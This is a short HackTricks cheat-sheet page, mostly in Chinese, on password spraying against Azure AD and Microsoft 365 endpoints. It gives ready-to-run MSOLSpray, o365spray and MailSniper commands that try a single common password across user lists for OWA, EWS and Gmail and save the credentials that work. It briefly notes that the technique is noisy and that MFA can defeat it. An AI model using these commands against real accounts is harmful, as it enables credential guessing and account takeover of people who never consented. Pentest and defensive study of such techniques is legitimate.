Az - Password Spraying

Support HackTricks

密码喷洒

Azure 中,这可以针对 不同的 API 端点 进行,如 Azure AD Graph、Microsoft Graph、Office 365 Reporting webservice 等。

然而,请注意,这种技术 非常嘈杂,蓝队可以 轻松捕捉到。此外,强制密码复杂性 和使用 MFA 可能使这种技术变得无用。

您可以使用 MSOLSpray 执行密码喷洒攻击。

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

或使用 o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

或使用 MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
支持 HackTricks

Last updated